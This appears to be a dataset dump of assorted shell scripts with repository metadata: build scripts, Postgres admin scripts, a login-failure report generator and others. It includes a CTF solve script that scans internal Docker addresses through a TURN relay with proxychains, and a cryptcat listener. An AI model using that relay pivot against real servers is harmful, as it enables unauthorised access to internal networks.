tar xzvf <(curl http://geolite.maxmind.com/download/geoip/database/GeoLite2-Country.tar.gz) -C $ROOT && \
mv GeoLite* $GEODATA
else
echo "Geodata already downloaded."
fi
| true
|
3810d460ce5a179236870ae2ce5ae0a31028c3ac
|
Shell
|
riddick5g/Bash
|
/flog
|
UTF-8
| 594
| 2.75
| 3
|
[] |
no_license
|
#!/bin/bash
#Christopher Rogers
#Lab 3
header='<html>
<body>
<h1> Failed Login Attempts Report as of'
footer='</html>
</body>'
endhead='</h1>'
echo $header >> ~/public_html/flog.html
date '+%A, %B, %d, %Y' >> ~/public_html/flog.html
echo $endhead >> ~/public_html/flog.html
awk '{ print $6 " " $7 " " $8 " " $9 " " $10 " " $11}' $1 \
| grep "Failed password for" | awk '{print $4}' \
| sort | uniq -c | sort -k1,1rn -k2.1 \
| sed 's/^/<br \/>/g' \
| sed 's/invalid/\<UNKNOWN\>/g' >> ~/public_html/flog.html
echo $footer >> ~/public_html/flog.html
chmod 755 ~/public_html/flog.html
exit 0
| true
|
b39c697c3eaa902bdde569602372f2088b78a9ff
|
Shell
|
segfaultsoftware/ordial
|
/pair
|
UTF-8
| 169
| 2.703125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
toggle=$(($RANDOM % 2))
if [[ $toggle -eq 0 ]]; then
GIT_DUET_AUTHORS_FILE=./.pairs git-duet ao ss
else
GIT_DUET_AUTHORS_FILE=./.pairs git-duet ss ao
fi
| true
|
14ddb5401a0e39a465e7aa5e4abebbf306c7c42e
|
Shell
|
kevinpark1217/CSAW-CTF-Quals-2020
|
/webRTC/turner-master/try.sh
|
UTF-8
| 190
| 2.609375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
for i in $(seq 2 255); do
./turner -server web.chal.csaw.io:3478 2>&1 | grep channel &
A=$!
sleep 0.25
proxychains curl 172.17.0.$i:5000
kill $A &>/dev/null
sleep 0.25
done
| true
|
942e8b7ada665a1a7543095390b2c7b74e201cc1
|
Shell
|
stolati/slant_online
|
/bin/copy-prod-db.bash
|
UTF-8
| 422
| 3.515625
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
set -eux -o pipefail
script_path="$(cd "$(dirname "$0")" ; pwd)"
# Required env variables
EC2_HOST="${EC2_HOST:-slant_aws}"
DB_PATH="$script_path/../db"
TIMESTAMP="$(date +%Y%m%d_%H%M%S)"
destination="$DB_PATH/db.json"
destination_save="$DB_PATH/save/db.prod.$TIMESTAMP.json"
# Copy to current directory
scp $EC2_HOST:~/db/db.json "$destination_save"
cp "$destination_save" "$destination"
exit 0
| true
|
3d1a09f249228367349bbd8bbc73446fd9ab2ce0
|
Shell
|
clearos/app-firewall-custom
|
/deploy/upgrade
|
UTF-8
| 1,249
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/sh
configlet="/etc/clearos/firewall.d/custom"
# Replace instances of [/usr/sbin/]iptables with $IPTABLES constant
#------------------------------------------------------------------
sed -i -e 's/\/usr\/sbin\/iptables/$IPTABLES/' $configlet
sed -i -e 's/iptables/$IPTABLES/' $configlet
# Modify fw script to handle ipv4/ipv6
#-------------------------------------
if [ -f $configlet ];then
if ! grep -q FW_PROTO $configlet;then
sed -i '1s/^/if [ \"\$FW_PROTO\" == \"ipv4\" ]; then true\n/' $configlet
sed -i '1s/^/\n/' $configlet
sed -i '1s/^/#===========================\n/' $configlet
sed -i '1s/^/# IPv4 Custom Firewall Rules\n/' $configlet
sed -i '1s/^/\n/' $configlet
sed -i '1s/^/#######################################\n/' $configlet
sed -i '1s/^/# Created by API - Please Do NOT Edit #\n/' $configlet
sed -i '1s/^/#######################################\n/' $configlet
sed -i -e "\$afi\n" $configlet
sed -i -e "\$a# IPv6 Custom Firewall Rules" $configlet
sed -i -e "\$a#===========================\n" $configlet
sed -i -e "\$aif [ \"\$FW_PROTO\" == \"ipv6\" ]; then true" $configlet
sed -i -e "\$afi" $configlet
fi
fi
| true
|
58fa73118a44eb91cce2f28951852b6e2fac4f3f
|
Shell
|
devkitPro/pacman-packages
|
/switch/curl/PKGBUILD
|
UTF-8
| 1,378
| 2.515625
| 3
|
[] |
no_license
|
# Maintainer: WinterMute <davem@devkitpro.org>
pkgname=switch-curl
pkgver=7.69.1
pkgrel=5
pkgdesc='An URL retrieval utility and library'
arch=('any')
url='http://www.zlib.net/'
license=('zlib')
options=(!strip libtool staticlibs)
depends=('switch-zlib' 'libnx')
makedepends=('switch-pkg-config' 'dkp-toolchain-vars')
source=(
"https://curl.haxx.se/download/curl-${pkgver}.tar.xz"
'switch-curl.patch'
)
groups=('switch-portlibs')
sha256sums=(
'03c7d5e6697f7b7e40ada1b2256e565a555657398e6c1fcfa4cb251ccd819d4f'
'723c7d884fc7c39ae1a3115ba245bb8c1415da47bbd60ab8f943ca98f92ebc9a'
)
build() {
cd curl-$pkgver
patch -Np1 -i $srcdir/switch-curl.patch
source /opt/devkitpro/switchvars.sh
LDFLAGS="-specs=${DEVKITPRO}/libnx/switch.specs ${LDFLAGS}"
./buildconf
./configure --prefix=$PORTLIBS_PREFIX --host=aarch64-none-elf \
--disable-shared --enable-static --disable-ipv6 --disable-unix-sockets \
--disable-manual --disable-ntlm-wb --disable-threaded-resolver \
--without-ssl --without-polar-ssl --without-cyassl --without-wolfssl \
--without-mbedtls \
--with-libnx \
--with-default-ssl-backend=libnx
make -C lib
}
package() {
cd curl-$pkgver
source /opt/devkitpro/switchvars.sh
make DESTDIR="$pkgdir" -C lib install
make DESTDIR="$pkgdir" -C include install
make DESTDIR="$pkgdir" install-binSCRIPTS install-pkgconfigDATA
}
| true
|
33890d0f22e8601aa8d9937434466ea07210a1c8
|
Shell
|
respeecher/benchmarks
|
/run_suite.sh
|
UTF-8
| 2,092
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
matmul () {
SIZE=$1
ITER=$2
echo -e "\n\nmatmul@${SIZE}:" | tee -a $LOGFILE
python super_burner.py --framework pytorch \
--task matmul \
--matrix-size $SIZE \
--iterations $ITER | tee -a $LOGFILE
}
rnn () {
SEQ=$1
ITER=$2
echo -e "\n\nrnn@seq=${SEQ}:" | tee -a $LOGFILE
python super_burner.py --framework pytorch \
--task rnn \
--input-size $SEQ \
--iterations $ITER | tee -a $LOGFILE
}
conv2d () {
INP=$1
KER=$2
ITER=$3
echo -e "\n\nconv2d@inp=${INP};ker=${KER}:" | tee -a $LOGFILE
python super_burner.py --framework pytorch \
--task conv2d \
--input-size-2d $INP \
--kernel-size $KER \
--iterations $ITER | tee -a $LOGFILE
}
lstm () {
SEQ=$1
ITER=$2
echo -e "\n\nlstm@${SEQ}:" | tee -a $LOGFILE
python super_burner.py --framework pytorch \
--task lstm \
--input-size $SEQ \
--iterations $ITER | tee -a $LOGFILE
}
LOGFILE=$1
GPU_DEVICE=$2
if [ ! -z "$GPU_DEVICE" ]
then
echo "##### RUNNING TESTS ON GPU (DEVICE ${GPU_DEVICE}) #########"
export CUDA_VISIBLE_DEVICES=$GPU_DEVICE
matmul 128 20000
matmul 512 1000
matmul 2048 50
rnn 30 20000
rnn 300 20000
rnn 3000 20000
conv2d 30 3 7000
conv2d 100 10 500
conv2d 100 50 1000
lstm 300 10000
lstm 3000 10000
lstm 30000 2000
else
echo "WARNING: Skipping GPU tests. If you want to run GPU tests,
specify the GPU device id as a second argument to this script."
fi
echo "##### RUNNING TESTS ON CPU ################################"
export CUDA_VISIBLE_DEVICES=
matmul 128 1500
matmul 512 100
matmul 2048 10
rnn 30 6000
rnn 300 3000
rnn 3000 500
conv2d 30 3 8000
conv2d 100 10 300
conv2d 100 50 40
lstm 300 1000
lstm 3000 500
lstm 30000 50
| true
|
547944229c237397967bdc4fe13cb5afd590a1ec
|
Shell
|
apache/bookkeeper
|
/bookkeeper-server/src/test/resources/networkmappingscript.sh
|
UTF-8
| 1,437
| 2.796875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
#/**
# * Copyright 2016 The Apache Software Foundation
# *
# * Licensed to the Apache Software Foundation (ASF) under one
# * or more contributor license agreements. See the NOTICE file
# * distributed with this work for additional information
# * regarding copyright ownership. The ASF licenses this file
# * to you under the Apache License, Version 2.0 (the
# * "License"); you may not use this file except in compliance
# * with the License. You may obtain a copy of the License at
# *
# * http://www.apache.org/licenses/LICENSE-2.0
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# */
#
# This script is used as NetworkTopology Mapping Script in TestRackawareEnsemblePlacementPolicyUsingScript.java TestSuite
# It just maps HostAddress to rack depending on the last character of the HostAddress string
# for eg.
# 127.0.0.1 - /1
# 127.0.0.2 - /2
# 199.12.34.21 - /1
# This script file is used just for testing purpose
# rack 0 returns script error (non-zero error code)
for var in "$@"
do
i=$((${#var}-1))
if [ "${var:$i:1}" == "0" ]; then
exit 1
fi
echo /${var:$i:1}
done
| true
|
d89158c847cbe6189a48ce5a04a9885ee4b35a08
|
Shell
|
todo-assert/rootfs
|
/V3s/v3s_rootfs_other/etc/init.d/rcS
|
UTF-8
| 1,357
| 3.125
| 3
|
[] |
no_license
|
#!/bin/sh
export ZLIB_LIBS=/usr/local/dfb_suports/zlib/lib
export LIBPNG_LIBS=/usr/local/dfb_suports/libpng/lib
export LIBPNG_CFLAGS=/usr/local/dfb_suports/libpng/include
export LIBJPEG=/usr/local/dfb_suports/libjpeg/lib
export LIBJPEG_CFLAGS=/usr/local/dfb_suports/libjpeg/include
export FREETYPE_LIBS=/usr/local/dfb_suports/freetype/lib
export FREETYPE_CFLAGS=/usr/local/dfb_suports/freetype/include:/usr/local/dfb_suports/freetype/include/freetype2
export TSLIB_LIBS=/usr/local/dfb_suports/tslib/build/lib
export TSLIB_CFLAGS=/usr/local/dfb_suports/tslib/build/include
export PKG_CONFIG_PREFIX=/usr/local/dfb_suports/libpng/lib/pkgconfig:/usr/local/dfb_suports/freetype/lib/pkgconfig
export LD_LIBRARY_PATH=$ZLIB_LIBS:$LIBPNG_LIBS:$LIBJPEG:$FREETYPE_LIBS:$TSLIB_LIBS:/usr/local/dfb_suports/libdfb/lib
export PATH=$PATH:/usr/local/dfb_suports/libdfb/bin
export TSLIB_CONSOLEDEVICE=none
export TSLIB_FBDEVICE=/dev/fb0
export TSLIB_TSDEVICE=/dev/input/event1
# Start all init scripts in /etc/init.d
# executing them in numerical order.
#
for i in /etc/init.d/S??* ;do
# Ignore dangling symlinks (if any).
[ ! -f "$i" ] && continue
case "$i" in
*.sh)
# Source shell script for speed.
(
trap - INT QUIT TSTP
set start
. $i
)
;;
*)
# No sh extension, so fork subprocess.
$i start
;;
esac
done
| true
|
5451db4217f8cc972707e1d1510510181ea9d8cc
|
Shell
|
openlibraryenvironment/mod-rs
|
/okapi-scripts/canRequest.sh
|
UTF-8
| 782
| 2.875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Set where this directory lives in relation to where it is being run from
SCRIPT_DIRECTORY=`dirname "$0"`
#echo Script directory: ${SCRIPT_DIRECTORY}
# setOkapiUrl sets the variable OKAPI_URL
. ${SCRIPT_DIRECTORY}/setOkapiUrl
#echo OKAPI URL: ${OKAPI_URL}
# Get hold of an auth token
AUTH_TOKEN=`${SCRIPT_DIRECTORY}/okapi-login`
#echo Auth Token: $AUTH_TOKEN
# Which tenant are we dealing with
TENANT="diku"
# The patron id
PATRON_ID="23033004447227"
#PATRON_ID="chas"
RESPONSE=$(curl --http1.1 -sSLf -H "x-okapi-token: $AUTH_TOKEN" -H 'accept: application/json' -H 'Content-type: application/json' \
-H "X-Okapi-Tenant: $TENANT" --connect-timeout 10 --max-time 30 -XGET "${OKAPI_URL}/rs/patron/${PATRON_ID}/canCreateRequest")
echo Request Response: $RESPONSE
| true
|
0fcf5be5d6bdc699a81fa0e8c04b19e2b026301b
|
Shell
|
atweiden/voidpkgs
|
/srcpkgs/tor/template
|
UTF-8
| 1,594
| 2.59375
| 3
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-public-domain"
] |
permissive
|
maintainer="nox"
pkgname="tor"
version=0.4.7.14
revision=1
short_desc="Anonymizing overlay network"
depends+=" ca-certificates"
depends+=" torsocks"
makedepends+=" libcap-devel"
makedepends+=" libevent-devel"
makedepends+=" liblzma-devel"
makedepends+=" libscrypt-devel"
makedepends+=" libseccomp-devel"
makedepends+=" libzstd-devel"
makedepends+=" zlib-devel"
checkdepends+=" coccinelle"
checkdepends+=" python3"
hostmakedepends="pkg-config"
homepage="https://www.torproject.org/"
license="BSD-3-Clause"
changelog="https://gitlab.torproject.org/tpo/core/tor/-/raw/main/ChangeLog"
distfiles="https://dist.torproject.org/$pkgname-$version.tar.gz"
checksum="a5ac67f6466380fc05e8043d01c581e4e8a2b22fe09430013473e71065e65df8"
conf_files="/etc/tor/torrc"
build_style="gnu-configure"
configure_args="--enable-zstd"
case "$XBPS_TARGET_MACHINE" in
# tests just don't work here
x86_64-musl)
make_check="no"
;;
esac
make_dirs="/var/lib/tor 0700 tor tor"
system_accounts="tor"
tor_homedir="/var/lib/tor"
pre_configure() {
# ensure convenient config
printf '%s\n' \
"## On startup, setuid to this user and setgid to their primary group." \
"## Can not be changed while tor is running." \
"User tor" >> src/config/torrc.sample.in
vsed \
-i \
-e 's:#Log notice syslog:Log notice syslog:' \
-e "s:#DataDirectory :DataDirectory :" \
src/config/torrc.sample.in
}
post_install() {
mv "$DESTDIR/etc/tor/torrc.sample" "$DESTDIR/etc/tor/torrc"
vlicense LICENSE
vdoc doc/torrc_format.txt
vsv tor
}
# vim: set filetype=sh foldmethod=marker foldlevel=0 nowrap:
| true
|
16597cdb7ec5da4833e125224e77149bd3a1b7a1
|
Shell
|
mathewHatch/Scripts
|
/Dictionary.bash
|
UTF-8
| 180
| 2.890625
| 3
|
[] |
no_license
|
#!/bin/bash
RUN=$(exec ps au | grep -v "grep" | grep sdcv)
SDCV=$(exec pidof sdcv)
if [ -z $RUN ]
then
exec urxvt -title Dictionary_Drop_Down -e sdcv --color
else
kill $SDCV
fi
| true
|
2b1d28a639c572ab759edfd6ae63ce5209e6940d
|
Shell
|
SkyN9ne/routopsy
|
/playground/FHRP/vulnerable_vrrp_network.sh
|
UTF-8
| 618
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
if [[ -z "$1" ]]; then
echo "Specify 'up' to create docker network and vrrp containers or"
echo "Specify 'down' to delete docker network and vrrp containers"
exit 1
fi
case $1 in
up)
docker-compose -f vulnerable_vrrp_network.yml up -d
docker exec -it vrrp_master iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
docker exec -it vrrp_slave iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
docker exec -it vrrp_victim route del -net 0.0.0.0/0
docker exec -it vrrp_victim route add -net 0.0.0.0/0 gw 172.13.37.254
;;
down)
docker-compose -f vulnerable_vrrp_network.yml down
esac
| true
|
815f2711a338e46e5336a6789d53f2739f06de26
|
Shell
|
MeterianHQ/meterian-github-action
|
/delete-release-from-github.sh
|
UTF-8
| 1,538
| 3.53125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
set -u
set -o pipefail
CURRENT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
TARGET_REPO="MeterianHQ/meterian-github-action"
RELEASE_VERSION="$(cat ${CURRENT_DIR}/version.txt)"
TAG_NAME="v$(cat ${CURRENT_DIR}/version.txt)"
if [[ -z ${METERIAN_GITHUB_TOKEN} ]]; then
echo "METERIAN_GITHUB_TOKEN cannot be found in the current environment, please populate to proceed either in the startup bash script of your OS or in the environment variable settings of your CI/CD interface."
exit -1
fi
echo ""
echo "~~~~ Fetching Release ID for ${TAG_NAME}"
mkdir -p ${CURRENT_DIR}/artifacts
CURL_OUTPUT="${CURRENT_DIR}/artifacts/github-release.listing"
curl \
-H "Authorization: token ${METERIAN_GITHUB_TOKEN}" \
-H "Accept: application/vnd.github.v3+json" \
-X GET "https://api.github.com/repos/${TARGET_REPO}/releases/tags/${TAG_NAME}" |
tee ${CURL_OUTPUT}
RELEASE_ID=$(cat ${CURL_OUTPUT} | grep id | head -n 1 | tr -d " " | tr "," ":" | cut -d ":" -f 2)
echo ""
echo "~~~~ Deleting release with ID ${RELEASE_ID} linked to ${TAG_NAME}"
curl \
-H "Authorization: token ${METERIAN_GITHUB_TOKEN}" \
-H "Accept: application/vnd.github.v3+json" \
-X DELETE "https://api.github.com/repos/${TARGET_REPO}/releases/${RELEASE_ID}"
echo ""
echo "~~~~ Deleting reference refs/tags/${TAG_NAME}"
curl \
-H "Authorization: token ${METERIAN_GITHUB_TOKEN}" \
-H "Accept: application/vnd.github.v3+json" \
-X DELETE "https://api.github.com/repos/${TARGET_REPO}/git/refs/tags/${TAG_NAME}"
| true
|
a46c9b68712ff8675b82572aabfb88fecd1f78a2
|
Shell
|
mc-b/bigdata
|
/spark/spark
|
UTF-8
| 317
| 3.25
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Startet den Docker Container und dann das CLI
#
export CONTAINER=spark01
export IMAGE=spark
export CMD=bash
b=`docker ps -a -q --filter "name=${CONTAINER}"`
if [ "${b}" != "" ]
then
docker stop ${b}
docker rm ${b}
fi
docker run -it --net=host --name ${CONTAINER} --entrypoint ${CMD} ${IMAGE}
| true
|
4511e5b0d910757b8c2400f90f156e4b6507101c
|
Shell
|
tankhuu/pipelines-as-code
|
/jenkins/scripts/bash/copy_db_site2site(1).sh
|
UTF-8
| 6,035
| 3.28125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
src_db=$1
src_dbpw=$2
dst_db=$3
dst_dbpw=$4
bk_date=$5
db_name="Athena"
user="edulog"
schema=""
bk_file=${db_name}.${bk_date}.bak
export PGPASSWORD=$src_dbpw;
pg_dump -U postgres -h $src_db ${db_name} > $bk_file
if [ $? -gt 0 ]; then
exit 1
echo $bk_file
fi
echo $dst_db
echo $dst_dbpw
export PGPASSWORD=$dst_dbpw
echo "=> Drop Database on Dest"
psql -U postgres -h $dst_db -c "ALTER DATABASE \""${db_name}"\" OWNER TO postgres";
psql -U postgres -h $dst_db -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname = '${db_name}';"
psql -U postgres -h $dst_db -c "DROP DATABASE \"${db_name}\""
echo "=> Recreate Database on Dest"
psql -U postgres -h $dst_db -c "CREATE DATABASE \"${db_name}\";"
psql -U postgres -h $dst_db -c "CREATE EXTENSION postgis;" $db_name
ls -l
psql -U postgres -h $dst_db -d "Athena" -f *.bak
# Update previleges for user in DB
psql -U postgres -h $dst_db -c "ALTER DATABASE \""${db_name}"\" OWNER TO "${user}"";
psql -U postgres -h $dst_db -c "GRANT ALL PRIVILEGES ON DATABASE \""${db_name}"\" to "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT USAGE ON SCHEMA geo_master TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON SCHEMA geo_master TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA geo_master TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA geo_master TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT USAGE ON SCHEMA public TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON SCHEMA public TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT USAGE ON SCHEMA settings TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON SCHEMA settings TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA settings TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA settings TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT USAGE ON SCHEMA edta TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON SCHEMA edta TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA edta TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA edta TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT USAGE ON SCHEMA rp_master TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON SCHEMA rp_master TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA rp_master TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA rp_master TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT USAGE ON SCHEMA ivin TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON SCHEMA ivin TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA ivin TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA ivin TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT USAGE ON SCHEMA geo_plan TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON SCHEMA geo_plan TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA geo_plan TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA geo_plan TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT USAGE ON SCHEMA rp_plan TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON SCHEMA rp_plan TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA rp_plan TO "${user}"";
psql -U postgres -h $dst_db -d ${db_name} -c "GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA rp_plan TO "${user}"";
# Update owner for Athena Schemas
# geo_plan | public | rp_master | rp_plan | settings
schema="geo_plan"
for table in `psql -U postgres -h $dst_db -tc "select tablename from pg_tables where schemaname = '${schema}';" ${db_name}` ; do psql -U postgres -h $dst_db -c "alter table ${schema}.${table} owner to ${user}" ${db_name} ; done
schema="geo_master"
for table in `psql -U postgres -h $dst_db -tc "select tablename from pg_tables where schemaname = '${schema}';" ${db_name}` ; do psql -U postgres -h $dst_db -c "alter table ${schema}.${table} owner to ${user}" ${db_name} ; done
schema="public"
for table in `psql -U postgres -h $dst_db -tc "select tablename from pg_tables where schemaname = '${schema}';" ${db_name}` ; do psql -U postgres -h $dst_db -c "alter table ${schema}.${table} owner to ${user}" ${db_name} ; done
schema="rp_master"
for table in `psql -U postgres -h $dst_db -tc "select tablename from pg_tables where schemaname = '${schema}';" ${db_name}` ; do psql -U postgres -h $dst_db -c "alter table ${schema}.${table} owner to ${user}" ${db_name} ; done
schema="rp_plan"
for table in `psql -U postgres -h $dst_db -tc "select tablename from pg_tables where schemaname = '${schema}';" ${db_name}` ; do psql -U postgres -h $dst_db -c "alter table ${schema}.${table} owner to ${user}" ${db_name} ; done
schema="settings"
for table in `psql -U postgres -h $dst_db -tc "select tablename from pg_tables where schemaname = '${schema}';" ${db_name}` ; do psql -U postgres -h $dst_db -c "alter table ${schema}.${table} owner to ${user}" ${db_name} ; done
| true
|
0451e7448779a9204e2e2d98d30e4e5ec70eecf3
|
Shell
|
mehidou/INEUCE
|
/vagrant/shell/install-site.sh
|
UTF-8
| 245
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
export DRUSH_PHP="/usr/bin/php"
export PATH=$PATH:/vagrant/bin
if [[ ! -d /vagrant/www ]]; then
echo "Installing site ..."
cd /vagrant
phing build
echo "Site installed."
else
echo "Site already installed."
fi
| true
|
528cb53a0e5629c1e5e9f2cbbe30527eaecc3b59
|
Shell
|
hewei1983/fabric-chaincode-evm
|
/scripts/check_docker_deps.sh
|
UTF-8
| 629
| 2.5625
| 3
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
#
# Copyright IBM Corp All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
docker inspect hyperledger/fabric-buildenv:latest &>/dev/null
if [ '$?' == '1' ]; then
# TODO: use below once fabric-buildenv images published
# docker pull hyperledger/fabric-buildenv:latest
echo "ERROR: hyperledger/fabric-buildenv:latest image required" && exit 1
fi
docker inspect hyperledger/fabric-peer:latest &>/dev/null
if [ '$?' == '1' ]; then
# TODO: use below once fabric 1.2 images published
# docker pull hyperledger/fabric-peer:latest
echo "ERROR: hyperledger/fabric-peer:latest image required" && exit 1
fi
| true
|
d2b4dc09ca63527b75e55f9c14f8aefcdf63f0e2
|
Shell
|
matthewbednarski/work-dotfiles
|
/sync-java-env
|
UTF-8
| 715
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
declare -a dirs
declare -a dist
i=0
for x in ~/java/*/*-[0-9]*
do
dir=${x%\/*}
has_dir=0
j=0
for d in ${dirs[*]}
do
if [[ "$d" == "$dir" ]]; then
has_dir=1
echo has dir
if [[ ${dist[$j]} > $x ]]; then
echo "${dist[$j]} > $x"
fi
if [[ ${dist[$j]} < $x ]]; then
echo "${dist[$j]} < $x"
dist[$j]=$x
echo "${dist[$j]}"
fi
fi
((j++))
done
if [[ $has_dir == 0 ]]; then
dirs[$i]=$dir
dist[$i]=$x
((i++))
fi
done
i=0
for x in ${dirs[*]}
do
# echo $x
cdold=$(pwd)
cd "$x"
t=${dist[$i]}
lnk=${t%-*}
# echo $lnk
if [[ -L $lnk ]];then
echo lnk exists
rm $lnk
fi
echo creating symlink $lnk
ln -s "${dist[$i]}" "$lnk"
cd "$cdold"
((i++))
done
| true
|
02281b13503cf20a616f29d1a5f4684192612230
|
Shell
|
illicitonion/binaries
|
/build-yarnpkg.sh
|
UTF-8
| 1,051
| 3.609375
| 4
|
[] |
no_license
|
#!/bin/bash -exuo pipefail
VERSION=${1:-"v1.2.0"}
CURRENT_MAC_VERSION="10.12"
ADDITIONAL_MAC_VERSIONS=(
10.6
10.7
10.8
10.9
10.10
10.11
)
ARCH_DIRECTORIES=(
linux/x86_64
mac/${CURRENT_MAC_VERSION}
)
wget https://github.com/yarnpkg/yarn/releases/download/${VERSION}/yarn-${VERSION}.tar.gz
mv yarn-${VERSION}.tar.gz yarnpkg-${VERSION}.tar.gz
for arch_directory in ${ARCH_DIRECTORIES[@]}
do
echo "Copying tar for yarnpkg ${VERSION}, ${arch_directory}..."
full_dest_dir="build-support/bin/yarnpkg/${arch_directory}/${VERSION}"
mkdir -p ${full_dest_dir}
cp -f ./yarnpkg-${VERSION}.tar.gz ${full_dest_dir}/yarnpkg.tar.gz
done
for additional_mac_version in "${ADDITIONAL_MAC_VERSIONS[@]}"
do
echo "Creating symlink for yarnpkg ${VERSION}, ${additional_mac_version}..."
full_symlink_dir="build-support/bin/yarnpkg/mac/${additional_mac_version}/${VERSION}"
mkdir -p ${full_symlink_dir}
ln -fs ../../${CURRENT_MAC_VERSION}/${VERSION}/yarnpkg.tar.gz ${full_symlink_dir}/yarnpkg.tar.gz
done
rm "yarnpkg-${VERSION}.tar.gz"
| true
|
472281f58a53398877ee86d5bdcfa9461764c56a
|
Shell
|
letees/Letees
|
/Raspberry Pi/piCAST/server.sh
|
UTF-8
| 1,266
| 3.6875
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/sh
############################################
# PiCAST Server/Listener
# ------------------------------------------
# Setup: chmod +x server.sh
# Start Command: sh /server.sh
############################################
########### Start PiCAST Networking ###########
# Pi IP/Port (Optional)
address="127.0.0.1"
port="8882"
########### End PiCAST Networking ###########
#echo "Reading Config File for Settings..."
pass=$(awk "NR==1 {print;exit}" con.cfg)
echo "Welcome to PiCAST!"
echo "------------------"
theIP=`/sbin/ifconfig wlan0 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'`
if [ $theIP != null ]; then
echo "To CAST, please send requests to IP: " $theIP
echo "+===================================================+"
echo "Example: pic_ytvideo <URL/VIDEO> | cryptcat $theIP $port -k <pass>"
else
theIP=`/sbin/ifconfig eth0 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'`
echo "To CAST, please send requests to IP: " $theIP
echo "+===================================================+"
echo "Example: pic_ytvideo <URL/VIDEO> | cryptcat $theIP $port -k <pass>"
fi
# Let's start the process of keeping me ALIVE!
while true
do
# We're going to use the pre-defined settings above, change as needed.
cryptcat -l -p $port -k $pass
done
| true
|
b29f3723ac25d16f3b34c0f3db645f39387bec60
|
Shell
|
vert-x3/vertx-mysql-postgresql-client
|
/vertx-mysql-postgresql-client-scala/src/test/resources/docker/start-postgres-ssl.sh
